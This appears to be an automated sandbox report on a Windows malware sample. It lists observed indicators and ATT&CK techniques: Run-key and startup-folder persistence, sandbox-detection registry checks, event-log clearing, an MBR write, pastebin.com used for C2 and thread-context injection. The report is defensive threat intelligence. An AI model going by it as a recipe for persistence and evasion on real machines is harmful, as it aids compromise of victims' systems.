gurcu | b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	KrnlSetupSus.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk	KrnlSetupSus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk	KrnlSetupSus.exe

Executes dropped EXE 2 IoCs

pid	Process
972	Install.exe
3488	KrnlSetupSus.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntoskrnl = "C:\\ProgramData\\ntoskrnl.exe"	KrnlSetupSus.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	pastebin.com
21	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

Drops file in System32 directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	lsass.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2304 set thread context of 4444	2304	powershell.EXE	87

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe

Checks processor information in registry 2 TTPs 19 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3600	timeout.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\ValidDeviceId	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02xxhocfehztebrs\DeviceId = "<Data><User username=\"02XXHOCFEHZTEBRS\"><HardwareInfo BoundTime=\"1734177501\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00184011D3029FD1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\Name = "DIDC"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02ygmmrhejyrygsu\AppIdList	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a69214f3d6736b4d85981f88e145522b000000000200000000001066000000010000200000003c4a853cc27878e1ec47eabdd5be9dabbd28b955d119c7cd4c1a9a9198f850a4000000000e8000000002000020000000a7c5432d428aa1ac2305e0a5832d8a37e3437084b0334f00afe7df488dc5991eb00300002f155f0987f3e4f13c29ee677225c360dd3d44c3a7fc38625c4b51caeb47e944d564e84701fbaecd15701861b22ce4e1464db7a4b8a5cc50724e1091e41a869c3f62307ece37bdcc56d21ce212cce90cf20c2dd11ddeeb82319f4bdf48fc8684b9ba8d4a015fda312dafb649bc9607ef0fd05c46919bc005372196367e78128b4bb5d9cd2a768f09ddad3d708bd665503ac8f967d5d626950e5f445906bf00055470c2a8e0c35a75723ef3357227bdf889c3a236812844ce91d5f6e72fe97d791cb8561e3a7ebdebe03f89584158df7a7ac62dd2827018e33851b8ae0bd52c7498d790ebac42f3ae3aa7eeebccf27919d1a22a25bd055c784b87155c01077c662bd9069cd89f6fb5ce703219aec1d5aadbc24f2f14fc4aace2b3ab9a2592af24430e210f72481aeacbdde92f5b4a6db07d028bc160ce52046e84561e3a21d2266eec1c51131e50474da469cab39450acaf1f60339e0f09c18b42a35b8353a869db9acccba5d0769e5b9f2391a85f02360238cbe8f808f851f24b061cb697a5fb9146430e5c9feb926c0e225b0bafb46b06c394780c05fb6cb9041dd993554dadc3c9a7bddf0b4677823e83e7ef59c8126e56204fb5febf62de1b9245743d1f3a0fd09eccb56c5750d1d2dcd5cfb4f0ff0d6d6ac5dfd70b24add4e13c1405924fcf084c3accb5bd2f2e4ebd27642540392480fa79f8fc800d5d686a5a0921c012acef3b93f20b7a7e95dc267ac9dd3c17a2acf693da0351277ed43e40d95ee0e79de6946a2a488e29919eec2ed007f77ae3d491842f2d789a66a50b07bf3bfaabe3ecb8157b4c8ed98f09abc560cd81bcfd0418fd5921e2ab61b4db3acdc2adc40359a10b8e75f8d3e90a1e05583b27d10e591c234fddba38ea2c91d8b12fb21e1cff5835dd419463008e1c9636e506cf3a42d9c1682041aa31cf67550e5070b1f92624bba96d6b15085dbe83d29cd90cff00715d9c0e65deeea14871191651bcd161ffa609fb5bdc9bb95da7c2711e1b0f69ed3efbca648103482c7e5cf3c872da08b14c251ebf1b7965194c638e1c5c8fa6ae4af3bab9137c7375249b8302c50cb19dc383adbba9a5eb410feaaabe13196c57ec1b93dbfab9e246be9468d35ff5f8901026f55cc20422b59b9b3b66f01f35cdbe08ec146e227922461f1f0ae15dfab3b4f1e66fcb3e6333fa43e3627c6226b22f80a82fb24daa33fa9a6a0ffe92800b95af9441f62d4ba49a1061bd9a1605a2cd81e7faaf6bbd016776dad9c0bd8d8e0fdac25f976ca581023147112706fea4bb1ae1e101ecf80120d80c83ba39faf7a98ff527a1ebc92140b39b731e40000000e14abdbe617a0e2e8e58a4e8f4306377541fcafac1144dbb9fe3f8f5e3d2e22ab24b04a5c7dad454dbe1882fb6b10afc852c428e0a646e2d59f87b6ab4c62413	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\URL = "https://login.live.com"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02ygmmrhejyrygsu\Request Saturday, December 14, 2024 11:58:19 = "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